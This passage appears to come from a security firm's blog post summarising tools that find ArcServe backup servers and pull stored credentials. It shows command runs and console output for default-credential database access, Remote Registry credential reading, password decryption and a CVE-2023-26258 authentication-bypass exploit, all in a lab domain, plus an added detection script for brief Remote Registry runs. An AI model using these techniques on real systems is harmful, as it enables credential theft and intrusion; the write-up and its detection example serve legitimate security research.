The TL;DR

If you are in the network you can scan for instances configured by default using I tried to port it to C# but couldn't, feel free to do it if you know how :)

c:\Users\vagrant\Desktop>python "Ethernet 2" 6969
                -=[ ArcServe Finder - @TheXC3LL  - MDSec ]=-

[*] Starting to monitor
[*] Broadcasting
WARNING: Mac address to reach destination not found. Using broadcast.
        [+] => ServerName;KINGSLANDING;InstanceName;ARCSERVE_APP;IsClustered;No;Version;15.0.2000.5;tcp;62197;;

If it is configured by default, you can use the default DB creds to connect to the IP and port obtained before and read the username/password, plus where the ArcServe instances are located, using

psyconauta@insulanova:/tmp|⇒  python3 -target -port 62197
		-=[ ArcServe credential retriever (from DB) - Juan Manuel Fernandez (@TheXC3LL)  - MDSec]=-

[*] Connecting to the server
[*] Login with default creds
[*] Extracting credentials:
	[+] User: SEVENKINGDOMS\vagrant
	[+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
	[+] User: SEVENKINGDOMS\vagrant
	[+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
[*] Finding hosts:
	[+] | kingslanding.sevenkingdoms.local | Windows Server 2019 Datacenter Evaluation
	[+] | kingslanding.sevenkingdoms.local | NULL

 Have a nice day! ^_^

All the passwords retrieved by the tools can be decrypted using ArcServeDecrypter.exe. Just edit the C code to add the array, compile and execute it:

                -={ ArcServe Decryptor by Juan Manuel Fernandez (@TheXC3LL) - MDSec}=-

[+] Decrypted string: vagrant

If you have a user with local admin privileges on the server where ArcServe is installed, you can read the credentials using the Remote Registry service (

psyconauta@insulanova:/tmp|⇒  python3 -u eddard.stark -p 'FightP3aceAndHonor!' -d sevenkingdoms.local -target-ip
		-=[ ArcServe Credential Stealer - (@TheXC3LL) - MDSec]=-
[+] Connecting to
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to
[+] Opening registry key
	[*] User: P3TWLADS11STD\vagrant
	[*] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
[+] Stopping Remote Registry Service

Have a nice day! ^_^
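
On the defender's side, the start, read, stop sequence in the output above shows up as a Remote Registry service that runs for only a few seconds. The following is an added example, not part of the original post or its tools: it flags such short-lived runs in an exported System log. The `timestamp|host|event_id|message` export layout, the 120-second window, the sample lines and the host `FILESRV01` are assumptions constructed for illustration, and it assumes the System log records Service Control Manager event 7036 in chronological order.

```python
import re
from datetime import datetime, timedelta

# Constructed sample export: timestamp|host|event_id|message
SAMPLE_EVENTS = """\
2023-06-28T10:14:02|KINGSLANDING|7036|The Remote Registry service entered the running state.
2023-06-28T10:14:09|KINGSLANDING|7036|The Remote Registry service entered the stopped state.
2023-06-28T11:00:00|FILESRV01|7036|The Remote Registry service entered the running state.
2023-06-28T11:45:00|FILESRV01|7036|The Remote Registry service entered the stopped state.
2023-06-28T12:00:00|KINGSLANDING|7036|The Print Spooler service entered the running state.
"""

STATE_RE = re.compile(
    r"^The Remote Registry service entered the (running|stopped) state\.$")


def short_lived_remote_registry(log_text, max_window=timedelta(seconds=120)):
    """Return (host, start, stop) for Remote Registry runs no longer than max_window."""
    started = {}  # host -> time of the last unmatched 'running' event
    hits = []
    for line in log_text.splitlines():
        parts = line.split("|", 3)
        if len(parts) != 4 or parts[2] != "7036":
            continue  # not a service state-change record
        match = STATE_RE.match(parts[3].strip())
        if not match:
            continue  # a different service
        try:
            when = datetime.fromisoformat(parts[0])
        except ValueError:
            continue  # skip malformed timestamps instead of aborting the scan
        host = parts[1].upper()
        if match.group(1) == "running":
            started[host] = when
        elif host in started:
            begin = started.pop(host)
            # A brief run matches the start/read/stop pattern shown above.
            if timedelta(0) <= when - begin <= max_window:
                hits.append((host, begin, when))
    return hits


if __name__ == "__main__":
    for host, begin, end in short_lived_remote_registry(SAMPLE_EVENTS):
        secs = int((end - begin).total_seconds())
        print(f"{host}: Remote Registry ran for {secs}s ({begin} -> {end})")
```

Correlating each hit with the network logon that precedes it on the same host tells you which account triggered the service start.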

Finally, if the ArcServe version was not patched (CVE-2023-26258) you can exploit an authentication bypass in the management web interface and retrieve the admin creds (

psyconauta@insulanova:/tmp|⇒  python3
		-=[ ArcServe Pwner by Juan Manuel Fernandez (@TheXC3LL) - MDSec]=-

[*] Triggering info leak
	[+] AdminName: SEVENKINGDOMS\vagrant
	[+] AuthUUID: 6bf37b8e-ac4f-487d-8d74-d6d0a8d9b8d1
[*] Getting a valid session
	[+] Session: AGENTJSESSIONID=CA35EF18A4FF2F85E25538F60C3F7428
[*] Doing an authenticated request to validate if session is valid
[*] Session is valid
	[+] Admin: SEVENKINGDOMS\vagrant
	[+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98} // Paste it to the decrypter

Have a happy hacking! ^_^

So here ends the summary of tools that you can find here.